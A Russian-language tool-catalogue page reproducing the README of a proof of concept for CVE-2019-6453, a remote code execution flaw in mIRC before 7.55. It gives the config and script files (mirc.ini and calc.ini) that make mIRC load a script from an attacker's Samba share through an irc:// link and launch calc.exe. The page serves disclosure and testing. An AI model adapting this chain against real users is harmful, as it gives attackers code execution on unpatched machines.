Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
mIRC-CVE-2019-6453 — Доказательство вычисления для CVE-2019-6453 | Kitploit
Инструменты/GitHubGitHub/andripwn/mirc-cve-2019-6453
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubandripwn/mirc-cve-2019-6453

mIRC-CVE-2019-6453

Доказательство вычисления для CVE-2019-6453

Репозиторий
117 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-6453: Удалённое выполнение кода в mIRC <7.55 через внедрение аргументов с помощью обработчиков пользовательских URI-протоколов

[Ссылка на статью]

Мы обнаружили уязвимость удалённого выполнения кода в mIRC через обработчик URI-протокола irc://. Поскольку mIRC не использует никаких символов, таких как --, для обозначения конца списка аргументов, злоумышленник может передать аргументы mIRC через ссылку irc:// и выполнить произвольный код, загрузив пользовательский mirc.ini с управляемого злоумышленником файлового сервера Samba. Обратите внимание, что ircs:// работает аналогично.

PoC

Для доказательства (PoC) требуются три файла: mirc.ini, calc.ini и poc.html. Предполагается, что на стороне злоумышленника запущен файловый сервер Samba. Для примера в следующих фрагментах кода предполагается, что он работает на хосте 127.0.0.1 (т.е. замените 127.0.0.1 на адрес вашего собственного сервера в следующих файлах, чтобы попробовать это).

mirc.ini

mirc.ini — это пользовательский файл конфигурации, который должен находиться по пути C:\mirc-poc\mirc.ini на файловом сервере.

root@kitploit:~
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini

calc.ini — это удалённый скриптовый файл, который должен находиться по пути C:\mirc-poc\calc.ini на файловом сервере.

root@kitploit:~
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html

Простое открытие poc.html должно сработать, если mIRC установлен как обработчик по умолчанию для схемы URI irc:// и браузер не кодирует полезную нагрузку. В зависимости от браузера и вашей конфигурации, всё равно может появиться запрос (в Firefox этого нет).

root@kitploit:~

PoC gif

PoC gif

Затронутые версии

Этот PoC работает для mIRC <7.55.

Вы можете запустить PoC в Edge 42.17134 (последняя предварительная версия) и Firefox 64.0.2 (последний релиз). Он не работает в Chrome из-за того, как Chrome обрабатывает URI-протоколы (URI кодируется перед передачей приложению).

Скачать инструмент